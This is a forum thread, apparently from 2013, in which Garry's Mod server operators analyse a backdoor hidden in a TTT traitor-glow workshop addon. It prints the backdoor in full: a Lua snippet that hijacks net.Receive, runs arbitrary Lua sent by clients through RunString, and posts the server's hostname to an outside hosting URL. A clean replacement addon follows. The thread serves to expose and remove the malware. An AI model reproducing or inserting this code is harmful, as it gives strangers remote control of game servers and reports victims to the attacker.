Is this doing what I think?



if (SERVER && game.IsDedicated()) then 
	timer.Simple(30,function() 
		local onr = net.Receive
		net.Receive = function(n, ...)
			if (n != "bdsm") then
				onr(n, unpack({...}))
			end
		end 
	 util.AddNetworkString("bdsm") onr("bdsm", function(l, p)
		RunString(net.ReadString())
	 end)
	 
	 http.Post("http://www.bg-server.3owl.com/", {hn = GetConVarString("hostname"), id = "GLOW"}, function(s) end, function(e) end) 
	 end)
 end


Sorry if it looks butchered, I did my best to fix it up. It was originally all done all on one line and hidden to the FAR right of the file where you would never even notice it.

And what do you think it does?

Calll me crazy but does it look like a back door?

Just looks like something that someone would hide in a script to get access to run Lua on someone’s server.

I thought so as well, thanks bud!

I found this backdoor in the TTT traitor glow off the workshop. Here is a safe non-workshop version:




--Stick in garrysmod/lua/autorun
local msg_name = "Halos_inform"

if SERVER then

	util.AddNetworkString(msg_name)
	
	hook.Add("PlayerDeath", "PlayerDeathHalos", function(ply)
		net.Start(msg_name)
		net.WriteEntity(ply)
		net.Send(GetTraitors())
	end)
	
else

	local rolestable = {}

	hook.Add("TTTEndRound", "TTTEndRoundResetTable", function()
		table.Empty(rolestable)
	end)

	hook.Add("TTTBeginRound", "TTTBeginRoundHalos", function()
		for k,v in pairs(player.GetAll()) do
			if v:GetRole() != ROLE_TRAITOR then continue end
			table.insert(rolestable, v) 
		end
	end)
	
	hook.Add("PreDrawHalos", "AddTraitorHalos", function()
		if LocalPlayer():IsActiveTraitor() then
			halo.Add(rolestable, Color(255,50,50), 2, 2, 2, true, true)
		end
	end)
	
	net.Receive(msg_name, function()
		local ent = net.ReadEntity()
		for k,v in pairs(rolestable) do
			if v == ent then
				table.remove(rolestable, k)
			end
		end
	end)
end																										


It runs every 30 seconds, sends some stuff to some free hosting site with a bsdm exploit. Some myg0t guy made this, remove it from your server immediatliy

It doesn’t run every 30 seconds, it runs once 30 seconds after the script is ran.

[editline]21st October 2013[/editline]

The HTTP stuff is probably just so the guy who made this crap knows which servers are “infected” with his malicious code.

Here’s a better version if you’re interested:
http://forum.facepunch.com/showthread.php?t=1259362&p=40192568&viewfull=1#post40192568

brb, spamming that URL with HTTP post requests

You are my hero! That is the entire reason I started to look at this file.